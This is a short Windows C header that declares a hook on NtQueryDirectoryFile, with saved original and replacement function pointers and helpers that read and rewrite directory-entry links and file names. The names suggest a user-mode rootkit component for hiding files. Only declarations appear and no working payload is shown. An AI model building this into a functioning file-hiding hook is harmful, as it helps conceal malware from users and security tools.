#include <winsock2.h>
#include <windows.h>
#include <time.h>
#include "ntdll.h"

typedef NTSTATUS (WINAPI* NTQUERYDIRECTORYFILE)(HANDLE,HANDLE,PIO_APC_ROUTINE,PVOID,PIO_STATUS_BLOCK,PVOID,ULONG,FILE_INFORMATION_CLASS,BOOLEAN,PUNICODE_STRING,BOOLEAN);

DWORD getDirEntryLenToNext(PVOID,FILE_INFORMATION_CLASS);
void setDirEntryLenToNext(PVOID,FILE_INFORMATION_CLASS,DWORD);
PVOID getDirEntryFileName(PVOID,FILE_INFORMATION_CLASS);
ULONG getDirEntryFileLength(PVOID,FILE_INFORMATION_CLASS);

#ifndef __NTQUERYDIRECTORYFILE__
#define __NTQUERYDIRECTORYFILE__

NTQUERYDIRECTORYFILE OldNtQueryDirectoryFile;
NTSTATUS WINAPI NewNtQueryDirectoryFile(HANDLE,HANDLE,PIO_APC_ROUTINE,PVOID,PIO_STATUS_BLOCK,PVOID,ULONG,FILE_INFORMATION_CLASS,BOOLEAN,PUNICODE_STRING,BOOLEAN);

#endif